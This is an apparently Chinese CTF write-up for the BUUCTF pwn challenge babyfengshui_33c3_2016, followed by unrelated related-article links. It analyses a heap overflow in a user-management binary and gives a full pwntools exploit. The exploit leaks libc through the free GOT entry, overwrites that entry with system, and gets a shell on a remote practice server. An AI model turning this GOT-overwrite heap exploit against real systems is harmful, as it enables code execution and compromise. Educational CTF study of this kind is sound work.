BUUCTF pwn babyfengshui_33c3_2016(简单堆)

2024-01-16 11:59

本文主要是介绍BUUCTF pwn babyfengshui_33c3_2016(简单堆),希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

0x01 文件分析

在这里插入图片描述

0x02 运行

在这里插入图片描述
 程序提供了几个简单的功能,增删改查都有。运行的时候程序有定时机制,可以用IDA的patch功能修改二进制指令,消除定时。

0x03 静态分析

主函数:

void __cdecl __noreturn main()
{char v0; // [esp+3h] [ebp-15h]int v1; // [esp+4h] [ebp-14h]size_t v2; // [esp+8h] [ebp-10h]unsigned int v3; // [esp+Ch] [ebp-Ch]v3 = __readgsdword(0x14u);setvbuf(stdin, 0, 2, 0);setvbuf(stdout, 0, 2, 0);while ( 1 ){puts("0: Add a user");puts("1: Delete a user");puts("2: Display a user");puts("3: Update a user description");puts("4: Exit");printf("Action: ");if ( __isoc99_scanf("%d", &v1) == -1 )break;if ( !v1 ){printf("size of description: ");__isoc99_scanf("%u%c", &v2, &v0);Add(v2);}if ( v1 == 1 ){printf("index: ");__isoc99_scanf("%d", &v2);delete(v2);}if ( v1 == 2 ){printf("index: ");__isoc99_scanf("%d", &v2);display(v2);}if ( v1 == 3 ){printf("index: ");__isoc99_scanf("%d", &v2);update(v2);}if ( v1 == 4 ){puts("Bye");exit(0);}if ( (unsigned __int8)count > 49u ){puts("maximum capacity exceeded, bye");exit(0);}}exit(1);
}

Add:
在这里插入图片描述
 Add函数进行了两次堆的申请,并且把第一次申请的堆的地址赋值到第二次申请的堆的数据之中,由此可以判断出此函数利用了一个结构体,而第二次申请的堆的大小是固定的,可以得到结构体的数据结构:

struct Node{char * description;char name[0x7C];
}

s便是description的空间地址,而v2则是结构体的空间。

delete:
在这里插入图片描述
 检查空间是否存在,free掉前面申请的空间并赋值为0。

display:
在这里插入图片描述
 显示数据

update:
在这里插入图片描述
 更新description里面的数据,需要注意的是其检查数据长度的方式(13行),是以description堆块的起始地址和name的起始地址之间的长度。

0x04 思路

 由于update函数中的判断数据长度是否合法的方式有问题,可以通过申请连续小堆块,再释放申请大堆块的方式绕过。
具体方式如下:
1.首先申请连续的3个结构体,description部分空间大小为0x80,方便计算:

堆块 0des 0x80堆块0 node 0x80堆块1 des 0x80堆块1 node 0x80堆块2 des 0x8堆块2 node 0x80

2.释放第一个结构体,得到一个空闲的0x100的堆块:

空闲堆块 0x100堆块1 des 0x80堆块1 node 0x80堆块2 des 0x8堆块2 node 0x80

3.申请新的结构体,其description部分为0x100,根据linux堆的性质,会优先分配空闲的堆块,释放得到的空闲堆块可以满足description的空间需求,而node的空间需要新分配,得到下面的结构:

堆块 0 des 0x100堆块1 des 0x80堆块1 node 0x80堆块2 des 0x8堆块2 node 0x80堆块0 node 0x80

根据判断数据合法长度的方式,堆块0的des和name相差地址为之间堆块的长度的和,绕过了长度判断,可以利用堆溢出来修改中间堆块的块首,得到libc,然后得到shell。
新版的libc其堆的机制有所改变(libc2.26及以上的,增加了tcache机制),不能以此利用

0x05 exp

from pwn import *
from LibcSearcher import *context.log_level = 'debug'#p = process('./babyfengshui')
p = remote('node3.buuoj.cn', 28668)
elf = ELF('babyfengshui')def Add(size, length, text):p.sendlineafter("Action: ", '0')p.sendlineafter("description: ", str(size))p.sendlineafter("name: ", 'qin')p.sendlineafter("length: ", str(length))p.sendlineafter("text: ", text)def Del(index):p.sendlineafter("Action: ", '1')p.sendlineafter("index: ", str(index))def Dis(index):p.sendlineafter("Action: ", '2')p.sendlineafter("index: ", str(index))def Upd(index, length, text):p.sendlineafter("Action: ", '3')p.sendlineafter("index: ", str(index))p.sendlineafter("length: ", str(length))p.sendlineafter("text: ", text)Add(0x80, 0x80, 'qin')
Add(0x80, 0x80, 'qin')
Add(0x8, 0x8, '/bin/sh\x00')
Del(0)#注意堆块块首的长度
Add(0x100, 0x19c, "a"*0x198+p32(elf.got['free']))
Dis(1)
p.recvuntil("description: ")
free_addr = u32(p.recv(4))libc = LibcSearcher('free', free_addr)
libc_base = free_addr - libc.dump('free')
sys_addr = libc_base + libc.dump('system')#堆块1的description指针已经被修改为free的地址,则可以将free地址内的内容替换为system
Upd(1, 0x4, p32(sys_addr))
Del(2)p.interactive()

一个简单的网络安全公众号,欢迎各位朋友们关注!

在这里插入图片描述

这篇关于BUUCTF pwn babyfengshui_33c3_2016(简单堆)的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/612529

相关文章

C++初始化数组的几种常见方法(简单易懂)

《C++初始化数组的几种常见方法(简单易懂)》本文介绍了C++中数组的初始化方法,包括一维数组和二维数组的初始化,以及用new动态初始化数组,在C++11及以上版本中,还提供了使用std::array... 目录1、初始化一维数组1.1、使用列表初始化(推荐方式)1.2、初始化部分列表1.3、使用std::

redis群集简单部署过程

《redis群集简单部署过程》文章介绍了Redis,一个高性能的键值存储系统,其支持多种数据结构和命令,它还讨论了Redis的服务器端架构、数据存储和获取、协议和命令、高可用性方案、缓存机制以及监控和... 目录Redis介绍1. 基本概念2. 服务器端3. 存储和获取数据4. 协议和命令5. 高可用性6.

JAVA调用Deepseek的api完成基本对话简单代码示例

《JAVA调用Deepseek的api完成基本对话简单代码示例》:本文主要介绍JAVA调用Deepseek的api完成基本对话的相关资料,文中详细讲解了如何获取DeepSeekAPI密钥、添加H... 获取API密钥首先,从DeepSeek平台获取API密钥,用于身份验证。添加HTTP客户端依赖使用Jav

利用Python编写一个简单的聊天机器人

《利用Python编写一个简单的聊天机器人》这篇文章主要为大家详细介绍了如何利用Python编写一个简单的聊天机器人,文中的示例代码讲解详细,感兴趣的小伙伴可以跟随小编一起学习一下... 使用 python 编写一个简单的聊天机器人可以从最基础的逻辑开始,然后逐步加入更复杂的功能。这里我们将先实现一个简单的

使用IntelliJ IDEA创建简单的Java Web项目完整步骤

《使用IntelliJIDEA创建简单的JavaWeb项目完整步骤》:本文主要介绍如何使用IntelliJIDEA创建一个简单的JavaWeb项目,实现登录、注册和查看用户列表功能,使用Se... 目录前置准备项目功能实现步骤1. 创建项目2. 配置 Tomcat3. 项目文件结构4. 创建数据库和表5.

使用PyQt5编写一个简单的取色器

《使用PyQt5编写一个简单的取色器》:本文主要介绍PyQt5搭建的一个取色器,一共写了两款应用,一款使用快捷键捕获鼠标附近图像的RGB和16进制颜色编码,一款跟随鼠标刷新图像的RGB和16... 目录取色器1取色器2PyQt5搭建的一个取色器,一共写了两款应用,一款使用快捷键捕获鼠标附近图像的RGB和16

四种简单方法 轻松进入电脑主板 BIOS 或 UEFI 固件设置

《四种简单方法轻松进入电脑主板BIOS或UEFI固件设置》设置BIOS/UEFI是计算机维护和管理中的一项重要任务,它允许用户配置计算机的启动选项、硬件设置和其他关键参数,该怎么进入呢?下面... 随着计算机技术的发展,大多数主流 PC 和笔记本已经从传统 BIOS 转向了 UEFI 固件。很多时候,我们也

基于Qt开发一个简单的OFD阅读器

《基于Qt开发一个简单的OFD阅读器》这篇文章主要为大家详细介绍了如何使用Qt框架开发一个功能强大且性能优异的OFD阅读器,文中的示例代码讲解详细,有需要的小伙伴可以参考一下... 目录摘要引言一、OFD文件格式解析二、文档结构解析三、页面渲染四、用户交互五、性能优化六、示例代码七、未来发展方向八、结论摘要

MyBatis框架实现一个简单的数据查询操作

《MyBatis框架实现一个简单的数据查询操作》本文介绍了MyBatis框架下进行数据查询操作的详细步骤,括创建实体类、编写SQL标签、配置Mapper、开启驼峰命名映射以及执行SQL语句等,感兴趣的... 基于在前面几章我们已经学习了对MyBATis进行环境配置,并利用SqlSessionFactory核

csu 1446 Problem J Modified LCS (扩展欧几里得算法的简单应用)

这是一道扩展欧几里得算法的简单应用题,这题是在湖南多校训练赛中队友ac的一道题,在比赛之后请教了队友,然后自己把它a掉 这也是自己独自做扩展欧几里得算法的题目 题意:把题意转变下就变成了:求d1*x - d2*y = f2 - f1的解,很明显用exgcd来解 下面介绍一下exgcd的一些知识点:求ax + by = c的解 一、首先求ax + by = gcd(a,b)的解 这个